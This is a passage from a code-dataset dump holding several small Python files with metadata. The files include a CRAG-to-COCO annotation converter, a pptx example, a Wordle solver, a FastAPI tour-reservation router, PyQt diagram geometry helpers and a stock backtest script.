"usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.bmm", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 228, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 239, "usage_type": "name"}, {"api_name": 
"torch.utils.model_zoo.load_url", "line_number": 251, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 251, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 266, "usage_type": "name"}, {"api_name": "torch.utils.model_zoo.load_url", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.utils.model_zoo", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 289, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.multinomial", "line_number": 292, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 296, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 317, "usage_type": "attribute"}, {"api_name": "torch.mean", "line_number": 326, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 328, "usage_type": "call"}, {"api_name": "torch.multinomial", "line_number": 329, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 333, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.unsqueeze", "line_number": 339, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 368, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 370, "usage_type": "attribute"}]}
+{"seq_id": "22664902940", "text": "import os\nimport datetime\n\nfrom pycococreatortools import pycococreatortools\nimport pycocotools\nfrom PIL.Image import Image\nfrom boxx import *\nimport cv2\nimport numpy as np\nimport os, glob\nimport json\nimport os\nimport re\nimport fnmatch\nfrom PIL import Image\nimport numpy as np\n\n\n\n\n\n\nINFO = {\n \"description\": \"Example Dataset\",\n \"url\": \"https://github.com/waspinator/pycococreator\",\n \"version\": \"0.1.0\",\n \"year\": 2018,\n \"contributor\": \"waspinator\",\n \"date_created\": datetime.datetime.utcnow().isoformat(' ')\n}\n\nLICENSES = [\n {\n \"id\": 1,\n \"name\": \"Attribution-NonCommercial-ShareAlike License\",\n \"url\": \"http://creativecommons.org/licenses/by-nc-sa/2.0/\"\n }\n]\n\nCATEGORIES = [\n {\n 'id': 1,\n 'name': 'cell',\n 'supercategory': 'cell',\n },\n]\n\ndef filter_for_jpeg(root, files):\n file_types = ['*.jpeg', '*.jpg', '*.png']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n return files\n\n\ndef filter_for_annotations(root, files, image_filename):\n file_types = ['*.png']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n basename_no_extension = os.path.splitext(os.path.basename(image_filename))[0]\n file_name_prefix = basename_no_extension + '.*'\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n files = [f for f in files if re.match(file_name_prefix, os.path.splitext(os.path.basename(f))[0])]\n return files\n\n\ndef translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR):\n coco_output = {\n \"info\": INFO,\n \"licenses\": LICENSES,\n \"categories\": CATEGORIES,\n \"images\": [],\n \"annotations\": []\n }\n i =0\n image_id = 1\n segmentation_id = 1\n\n # filter for jpeg images\n for root, _, files in os.walk(IMAGE_DIR):\n #所有图片\n image_files = filter_for_jpeg(root, files)\n # tree-image_files\n finish = []\n # go through each image\n for image_filename in image_files:\n image = Image.open(image_filename)\n i+=1\n# image_filename_json = image_filename.split('cell')\n\n# image_filename_json = image_filename_json[0][:-1]+'.png'\n# print(image_filename_json)\n #创建image_info,这个其实就是每张图放进去而不是每个实例\n# if image_filename_json not in finish:\n image_info = pycococreatortools.create_image_info(\n image_id, os.path.basename(image_filename), image.size)\n coco_output[\"images\"].append(image_info)\n# finish.append(image_filename_json)\n \n\n #这方面应该先\n # filter for associated png annotations\n for root, _, files in os.walk(ANNOTATION_DIR):\n annotation_files = filter_for_annotations(root, files, image_filename)\n\n # go through each associated annotation\n for annotation_filename in annotation_files:\n \n annotation_filename_json = annotation_filename.split('cell')\n\n annotation_filename_json = annotation_filename_json[0][:-1]+'.png'\n\n print(\"image_filename:\",image_filename,\"\\nannotation_filename:\",annotation_filename,\"\\n\",\n \"annotation_filename_json:\",annotation_filename_json,\"\\n\")\n \n image_filename_compare = image_filename.split('/')[-1]\n annotation_filename_json_compare = annotation_filename_json.split('/')[-1]\n \n if annotation_filename_json_compare == image_filename_compare:\n print(\"!!!!!\")\n class_id = [x['id'] for x in CATEGORIES if x['name'] in annotation_filename][0]\n\n tree-class_id\n\n category_info = {'id': class_id, 'is_crowd': 'crowd' in image_filename}\n binary_mask = 
np.asarray(Image.open(annotation_filename)\n .convert('1')).astype(np.uint8)\n\n annotation_info = pycococreatortools.create_annotation_info(\n segmentation_id, image_id, category_info, binary_mask,\n image.size, tolerance=2)\n\n if annotation_info is not None :\n coco_output[\"annotations\"].append(annotation_info)\n\n segmentation_id = segmentation_id + 1\n image_id = image_id + 1\n\n\n\n # with open('{}/instances_train2017.json'.format(ANNOTATION_DIR), 'w') as output_json_file:\n # json.dump(coco_output, output_json_file)\n with open('{}/instances_val2017.json'.format(ANNOTATION_DIR), 'w') as output_json_file:\n json.dump(coco_output, output_json_file)\n print(i)\n\n\n\ndef main():\n\n # ROOT_DIR = '/home/huang/dataset/CRAG_v2/CRAG/train'\n # IMAGE_DIR = os.path.join(ROOT_DIR, \"Images\")\n # ANNOTATION_DIR = os.path.join(ROOT_DIR, \"annotations\")\n\n\n # translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR)\n\n ROOT_DIR = '/home/huang/dataset/CRAG_v2/CRAG/valid'\n IMAGE_DIR = os.path.join(ROOT_DIR, \"Images\")\n ANNOTATION_DIR = os.path.join(ROOT_DIR, \"annotations\")\n\n # print(IMAGE_DIR,ANNOTATION_DIR,'????')\n translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR)\n\n\n# ROOT_DIR = '/home/huang/dataset/CRAG_v2/test_json/annotation'\n# IMAGE_DIR = os.path.join(ROOT_DIR, \"Image\")\n# ANNOTATION_DIR = os.path.join(ROOT_DIR, \"annotations\")\n\n translate(ROOT_DIR,IMAGE_DIR,ANNOTATION_DIR)\n\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "XiaoyuZHK/CRAG-Dataset_Aug_ToCOCO", "sub_path": "CRAGInstance_To_Json.py", "file_name": "CRAGInstance_To_Json.py", "file_ext": "py", "file_size_in_byte": 5787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "fnmatch.translate", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 52, "usage_type": "call"}, {"api_name": "fnmatch.translate", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 62, "usage_type": "call"}, {"api_name": "re.match", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 63, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 80, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "pycococreatortools.pycococreatortools.create_image_info", "line_number": 95, "usage_type": "call"}, {"api_name": "pycococreatortools.pycococreatortools", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, 
{"api_name": "os.walk", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 126, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 126, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pycococreatortools.pycococreatortools.create_annotation_info", "line_number": 129, "usage_type": "call"}, {"api_name": "pycococreatortools.pycococreatortools", "line_number": 129, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}]}
+{"seq_id": "30773348528", "text": "from pptx import Presentation\nfrom csv_loader import srednia\n\nprs = Presentation()\n\nslide_layout = prs.slide_layouts[1]\n\nslide = prs.slides.add_slide(slide_layout)\nshapes = slide.shapes\n\ntitle_shape = shapes.title\n\nbody_shape = shapes.placeholders[1]\n\ntitle_shape.text = 'Jakis text'\n\ntf = body_shape.text_frame\ntf.text = 'Zawartosc text frame'\n\np = tf.add_paragraph()\np.text = \"Kobiety - srednia wieku\"\np.level = 1\n\np = tf.add_paragraph()\np.text = f\"{srednia()}\"\np.level = 2\n\nprs.save(\"raport.pptx\")\n\n", "repo_name": "jacek-szymborski/bootcamp", "sub_path": "zjazd_4/pptx_przyklad.py", "file_name": "pptx_przyklad.py", "file_ext": "py", "file_size_in_byte": 502, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pptx.Presentation", "line_number": 4, "usage_type": "call"}, {"api_name": "csv_loader.srednia", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "31520708426", "text": "import wordle_dict as wd\nimport logging\nimport log_config # import does logging config\nimport wordle_util as wu\n\nlog = logging.getLogger(__name__)\n\n\nclass WordFrequencyStrategy:\n def __init__(self, dictionary: list[tuple[str, int]] = wd.load_frequency(), exploration_settings: map = None):\n self.dictionary = dictionary\n\n exploration_settings = exploration_settings or {\"first_word\": \"raise\"}\n\n # This is what Dave was using, so for now we're matching that to validate parity with his implementation\n self.forced_first_word = exploration_settings[\"first_word\"]\n\n def next_guess(self):\n if self.forced_first_word:\n guess = self.forced_first_word\n self.forced_first_word = None\n else:\n guess = self.dictionary[0][0] if self.dictionary else None\n\n log.debug(f\"next_guess={guess}\")\n return guess\n\n def accept_result(self, results: list[str], guess: str):\n log.debug(f\"accept_result, word={guess}, result={results}\")\n\n misplaced_letters = wu.count_misplaced_letters(guess, results)\n\n log.debug(\"Misplaced letters: %s\", misplaced_letters)\n\n new_dictionary = []\n for ws_tuple in self.dictionary:\n if wu.is_possible_solution(ws_tuple[0], guess, results, misplaced_letters):\n new_dictionary.append(ws_tuple)\n\n if len(new_dictionary) == len(self.dictionary):\n log.warn(\n f\"Feedback didn't remove any words from consideration. old_size={len(self.dictionary)}, new_size={len(new_dictionary)}\")\n\n self.dictionary = new_dictionary\n", "repo_name": "breischl/wordle_solver", "sub_path": "word_frequency_strategy.py", "file_name": "word_frequency_strategy.py", "file_ext": "py", "file_size_in_byte": 1617, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "wordle_dict.load_frequency", "line_number": 10, "usage_type": "call"}, {"api_name": "wordle_util.count_misplaced_letters", "line_number": 31, "usage_type": "call"}, {"api_name": "wordle_util.is_possible_solution", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "5919674501", "text": "import aiohttp\nfrom fastapi import (\n APIRouter,\n Body,\n Header,\n Depends,\n status,\n Response,\n HTTPException,\n Path\n)\n\nfrom data.pydantic import (\n RegisterTour,\n User,\n BillPayed,\n Tour,\n Bill\n)\n\nfrom exceptions import TourNotEnoughSpace\nfrom tasks import release_tour, add\nfrom config import AUTHORIZATION_URL\nfrom config import TOUR_API\nfrom config import PAYMENT_API\n\nrouter = APIRouter()\n\naiohttp_session = aiohttp.ClientSession()\n\n\n@router.on_event(\"shutdown\")\nasync def close_aiohttp_session():\n await aiohttp_session.close()\n\n\nasync def authorization_header(\n authorization: str = Header(\n ...,\n alias=\"Authorization\",\n title='authorization header',\n description=\"authorization header\"\n )\n):\n return authorization\n\n\nasync def get_user(\n token: str = Depends(authorization_header)\n):\n user = None\n\n key = token.split(\" \")[1]\n\n async with aiohttp_session.post(AUTHORIZATION_URL, json={\n 'key': key\n }) as response:\n data = await response.json()\n\n if response.status == status.HTTP_401_UNAUTHORIZED:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED\n )\n user = User.parse_obj(data)\n\n return user\n\n\n# @router.get('/add/{a}/{b}')\n# async def add_numbers(\n# a: int = Path(...),\n# b: int = Path(...)\n# ):\n# add.delay(a, b)\n\n\n@router.post('/reserve', response_model=Bill)\nasync def reserve_tour(\n register_tour: RegisterTour = Body(\n ...,\n title='register tour data'\n ),\n user: User = Depends(get_user)\n):\n tour: Tour\n\n async with aiohttp_session.patch(\n f\"{TOUR_API}/tour/{register_tour.tour_id}/reserve\",\n json={\n 'count': register_tour.reserve_count\n }) as response:\n data = await response.json()\n\n tour = Tour.parse_obj(data)\n\n if response.status == status.HTTP_406_NOT_ACCEPTABLE:\n raise TourNotEnoughSpace()\n\n async with aiohttp_session.post(\n f\"{PAYMENT_API}/bills\",\n json={\n 'user_id': user.id,\n 'tour_id': register_tour.tour_id,\n 'reserve_count': register_tour.reserve_count,\n 'item_cost': tour.price\n }) as response:\n if response.status != status.HTTP_200_OK:\n raise HTTPException(\n status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,\n detail=\"an error occurred while getting payment info\"\n )\n data = await response.json()\n\n bill = Bill.parse_obj(data)\n\n release_tour.apply_async(\n (bill.id, bill.tour_id, bill.reserve_count),\n count_down=600\n )\n\n return bill\n", "repo_name": "ShAlireza/SADProject", "sub_path": "cart/routers/cart.py", "file_name": "cart.py", "file_ext": "py", "file_size_in_byte": 2763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 27, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 29, "usage_type": "call"}, {"api_name": "fastapi.Header", "line_number": 38, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 49, "usage_type": "call"}, {"api_name": "config.AUTHORIZATION_URL", "line_number": 55, "usage_type": "argument"}, {"api_name": "data.pydantic", "line_number": 58, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 60, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 60, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 61, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 62, "usage_type": "attribute"}, {"api_name": 
"fastapi.status", "line_number": 62, "usage_type": "name"}, {"api_name": "data.pydantic.User.parse_obj", "line_number": 64, "usage_type": "call"}, {"api_name": "data.pydantic", "line_number": 64, "usage_type": "argument"}, {"api_name": "data.pydantic.User", "line_number": 64, "usage_type": "name"}, {"api_name": "data.pydantic.RegisterTour", "line_number": 79, "usage_type": "name"}, {"api_name": "data.pydantic.User", "line_number": 83, "usage_type": "name"}, {"api_name": "fastapi.Body", "line_number": 79, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 83, "usage_type": "call"}, {"api_name": "data.pydantic.Tour", "line_number": 85, "usage_type": "name"}, {"api_name": "config.TOUR_API", "line_number": 88, "usage_type": "name"}, {"api_name": "data.pydantic", "line_number": 92, "usage_type": "name"}, {"api_name": "data.pydantic.Tour.parse_obj", "line_number": 94, "usage_type": "call"}, {"api_name": "data.pydantic", "line_number": 94, "usage_type": "argument"}, {"api_name": "data.pydantic.Tour", "line_number": 94, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_406_NOT_ACCEPTABLE", "line_number": 96, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 96, "usage_type": "name"}, {"api_name": "exceptions.TourNotEnoughSpace", "line_number": 97, "usage_type": "call"}, {"api_name": "config.PAYMENT_API", "line_number": 100, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 107, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 107, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 108, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 109, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 109, "usage_type": "name"}, {"api_name": "data.pydantic", "line_number": 112, "usage_type": "name"}, {"api_name": "data.pydantic.Bill.parse_obj", "line_number": 114, "usage_type": "call"}, {"api_name": "data.pydantic", "line_number": 114, "usage_type": "argument"}, {"api_name": "data.pydantic.Bill", "line_number": 114, "usage_type": "name"}, {"api_name": "tasks.release_tour.apply_async", "line_number": 116, "usage_type": "call"}, {"api_name": "tasks.release_tour", "line_number": 116, "usage_type": "name"}, {"api_name": "data.pydantic.Bill", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "12506233712", "text": "import math\n\nfrom PyQt5.QtCore import QPoint\n\nimport block, arrow, combine\n\n# 点と点\ndef disPointPoint(point1_pos, point2_pos):\n po = point1_pos - point2_pos\n return math.hypot(po.x(), po.y())\n\n# 点と点\ndef nearestPointPoint(point1_pos, point2_pos):\n dis = disPointPoint(point1_pos, point2_pos)\n return dis\n\n# 点と円\ndef nearestPointCircle(point_pos, circle_pos, radius):\n dis = disPointPoint(point_pos, circle_pos)\n\n po = circle_pos + (point_pos - circle_pos) * radius / dis\n return po\n\n# 点と直線\ndef nearestPointLine(point_pos, line_start, line_end):\n po_x = point_pos.x()\n po_y = point_pos.y()\n li_start_x = line_start.x()\n li_start_y = line_start.y()\n li_end_x = line_end.x()\n li_end_y = line_end.y()\n\n if li_start_x == li_end_x: # when vertical line\n small_y = min(li_start_y, li_end_y)\n large_y = max(li_start_y, li_end_y)\n\n if large_y <= po_y:\n return QPoint(li_start_x, large_y)\n elif large_y > po_y and small_y < po_y:\n return QPoint(li_start_x, po_y)\n else:\n return QPoint(li_start_x, small_y)\n\n else: # when horizontal line\n small_x = min(li_start_x, li_end_x)\n large_x = max(li_start_x, li_end_x)\n\n if large_x <= po_x:\n return QPoint(large_x, li_start_y)\n elif large_x > po_x and small_x < po_x:\n return QPoint(po_x, li_start_y)\n else:\n return QPoint(small_x, li_start_y)\n\n# 点とブロック\ndef nearestPointBlock(point_pos, block_start, block_end):\n po_x = point_pos.x()\n po_y = point_pos.y()\n bl_start_x = block_start.x()\n bl_start_y = block_start.y()\n bl_end_x = block_end.x()\n bl_end_y = block_end.y()\n\n pos = []\n\n pos.append(nearestPointLine(point_pos, QPoint(bl_start_x, bl_start_y), QPoint(bl_end_x, bl_start_y)))\n pos.append(nearestPointLine(point_pos, QPoint(bl_end_x, bl_start_y), QPoint(bl_end_x, bl_end_y)))\n pos.append(nearestPointLine(point_pos, QPoint(bl_start_x, bl_end_y), QPoint(bl_end_x, bl_end_y)))\n pos.append(nearestPointLine(point_pos, QPoint(bl_start_x, bl_start_y), QPoint(bl_start_x, bl_end_y)))\n\n dis = []\n for p in pos:\n dis.append(math.hypot(p.x() - po_x, p.y() - po_y))\n\n pos_dis = [pos[0], dis[0]]\n for i in range(len(pos) - 1):\n if pos_dis[1] > dis[i + 1]:\n pos_dis = [pos[i + 1], dis[i + 1]]\n\n return pos_dis\n\n# 点と矢印\ndef nearestPointArrow(point_pos, arrow_way_pos):\n po_x = point_pos.x()\n po_y = point_pos.y()\n\n if len(arrow_way_pos) == 1:\n return [None, None]\n\n pos = []\n\n for i in range(len(arrow_way_pos) - 1):\n ar_pre_p = arrow_way_pos[i]\n ar_post_p = arrow_way_pos[i + 1]\n pos.append(nearestPointLine(point_pos, ar_pre_p, ar_post_p))\n\n dis = []\n for p in pos:\n dis.append(math.hypot(p.x() - po_x, p.y() - po_y))\n\n pos_dis = [pos[0], dis[0]]\n for i in range(len(pos) - 1):\n if pos_dis[1] > dis[i + 1]:\n pos_dis = [pos[i + 1], dis[i + 1]]\n\n return pos_dis\n\n# ブロックと矢印\n#def nearestBlockArrow(block_start, block_end, ar_way_pos):\n# bl_start_x = block_start.x()\n# bl_start_y = block_start.y()\n# bl_end_x = block_end.x()\n# bl_end_y = block_end.y()\n#\n# if ar_way_pos == []:\n# return [None, None]\n# \n# pos = []\n#\n# pos.append(nearestPointLine(way_pos[0], QPoint(bl_start_x, bl_end_y), QPoint(bl_end_x, bl_end_y)))\n# pos.append(nearestPointLine(way_pos[0], QPoint(bl_end_x, bl_start_y), QPoint(bl_end_x, bl_end_y)))\n# pos.append(nearestPointLine(way_pos[-1], QPoint(bl_start_x, bl_end_y), QPoint(bl_end_x, bl_end_y)))\n# pos.append(nearestPointLine(way_pos[-1], QPoint(bl_end_x, bl_start_y), QPoint(bl_end_x, bl_end_y)))\n#\n# dis = []\n# for p in pos:\n# 
dis.append(math.hypot(p.x() - pos_x, p.y() - pos_y))\n#\n# pos_dis = [pos[0], dis[0]]\n# for i in range(len(pos) - 1):\n# if pos_dis[1] > dis[i + 1]:\n# pos_dis = [pos[i + 1], dis[i + 1]]\n#\n# return pos_dis\n\n# point vs. combine\ndef nearestPointCombine(point_pos, combine_pos, radius):\n pos = nearestPointCircle(point_pos, combine_pos, radius)\n dis = disPointPoint(pos, point_pos)\n pos_dis = [pos, dis]\n return pos_dis\n\ndef nearObjPosDis(pos, all_obj, is_blue):\n pos_all = []\n dis_all = []\n obj_all = []\n\n # nearest position and distance from the cursor to each object\n for o in all_obj:\n if o.mode == -1:\n continue\n if type(o) == block.Block:\n [tmp_pos, tmp_dis] = nearestPointBlock(pos, o.start_pos, o.end_pos)\n elif type(o) == arrow.Arrow:\n [tmp_pos, tmp_dis] = nearestPointArrow(pos, o.way_pos)\n elif type(o) == combine.Combine:\n [tmp_pos, tmp_dis] = nearestPointCombine(pos, o.pos, o.radius)\n pos_all.append(tmp_pos)\n dis_all.append(tmp_dis)\n obj_all.append(o)\n\n if pos_all == []: # no existing objects\n # self.setEndPoint(mouse_pos)\n return [None, None, None]\n\n # find the dis, pos, obj with the minimum distance\n min_dis = min(dis_all)\n min_pos = pos_all[dis_all.index(min_dis)]\n min_obj = obj_all[dis_all.index(min_dis)]\n\n\n for o in all_obj:\n # first un-highlight (un-blue) everything\n if is_blue == True:\n o.setFrameBlue(False)\n if min_dis < 10: # if the distance is close enough\n # highlight that object in blue and select it\n if is_blue == True:\n min_obj.setFrameBlue(True)\n return [min_obj, min_pos, min_dis]\n else:\n return [None, None, None]\n\ndef nearArrowPosDis(pos, all_obj, is_blue):\n pos_all = []\n dis_all = []\n obj_all = []\n\n # nearest position and distance from the cursor to each object\n for o in all_obj:\n if o.mode == -1:\n continue\n if type(o) == arrow.Arrow:\n tmp_pos = o.way_pos[-1]\n tmp_dis = nearestPointPoint(pos, o.way_pos[-1])\n pos_all.append(tmp_pos)\n dis_all.append(tmp_dis)\n obj_all.append(o)\n if type(o) == arrow.Arrow:\n tmp_pos = o.way_pos[0]\n tmp_dis = nearestPointPoint(pos, o.way_pos[0])\n pos_all.append(tmp_pos)\n dis_all.append(tmp_dis)\n obj_all.append(o)\n\n if pos_all == []: # no existing objects\n return [None, None, None]\n\n # find the dis, pos, obj with the minimum distance\n min_dis = min(dis_all)\n min_pos = pos_all[dis_all.index(min_dis)]\n min_obj = obj_all[dis_all.index(min_dis)]\n\n\n # TODO: highlight only the endpoints in blue, not the whole arrow\n for o in all_obj:\n # first un-highlight (un-blue) everything\n if is_blue == True:\n o.setFrameBlue(False)\n if min_dis < 10: # if the distance is close enough\n # highlight that object in blue and select it\n if is_blue == True:\n min_obj.setFrameBlue(True)\n if min_pos == min_obj.way_pos[0]: # if it was the first point\n po = min_obj.way_pos[0] - min_obj.way_pos[1]\n tmp_pos = min_pos + po * 9 / max(abs(po.x()), abs(po.y()))\n return [min_obj, tmp_pos, min_dis]\n elif min_pos == min_obj.way_pos[-1]: # if it was the last point\n po = min_obj.way_pos[-1] - min_obj.way_pos[-2]\n tmp_pos = min_pos + po * 9 / max(abs(po.x()), abs(po.y()))\n return [min_obj, tmp_pos, min_dis]\n else:\n return [None, None, None]\n else:\n return [None, None, None]\n", "repo_name": "takayuki5168/BlockDiagramMaker", "sub_path": "math_util.py", "file_name": "math_util.py", "file_ext": "py", "file_size_in_byte": 7534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.hypot", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", 
"line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 53, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QPoint", "line_number": 69, "usage_type": "call"}, {"api_name": "math.hypot", "line_number": 73, "usage_type": "call"}, {"api_name": "math.hypot", "line_number": 99, "usage_type": "call"}, {"api_name": "block.Block", "line_number": 152, "usage_type": "attribute"}, {"api_name": "arrow.Arrow", "line_number": 154, "usage_type": "attribute"}, {"api_name": "combine.Combine", "line_number": 156, "usage_type": "attribute"}, {"api_name": "arrow.Arrow", "line_number": 193, "usage_type": "attribute"}, {"api_name": "arrow.Arrow", "line_number": 199, "usage_type": "attribute"}]}
+{"seq_id": "19161791299", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport get_cn_data as gcd\n\nticker_name = str(input(\"Enter ticker number: \"))\ngetter = gcd.stock_data(ticker_name)\ngetter.get_stock_price()\nticker = getter.get_ticker()\n\nCAPITAL = 1000000\n\nfile = \"../cn_intraday/\" + ticker + \".csv\"\ndf = pd.read_csv(file)\ndf['delta'] = df['close'].diff()\ndf['delta'][df['delta'] > 0] = 1\ndf['delta'][df['delta'] < 0] = -1\ndf['delta'][df['delta'] == 0] = 0\nfor i in range(5):\n\tdf['delta' + str(i)] = df['delta'].shift(i)\n\ndf['delta_score'] = df[['delta', 'delta0', 'delta1', 'delta2', 'delta3', 'delta4']].sum(axis = 1, skipna = False)\ndf['alpha'] = -df['delta_score'].shift(1)\ndf['alpha_adjusted'] = df['alpha'] / 5\ndf['capital_alloc'] = df['alpha_adjusted'] * CAPITAL\ndf['pct_change'] = df['close'].pct_change()\ndf['daily_pnl'] = df['capital_alloc'] * df['pct_change']\n\n# calculate sharpe ratio (if using daily data)\nsharpe = np.sqrt(252) * (df['daily_pnl'].mean() - 0.04 / 252) / df['daily_pnl'].std()\nprint('sharpe ratio is : ', sharpe)\n\n\n# plot graph\nplt.plot(df['daily_pnl'].cumsum())\nplt.show()", "repo_name": 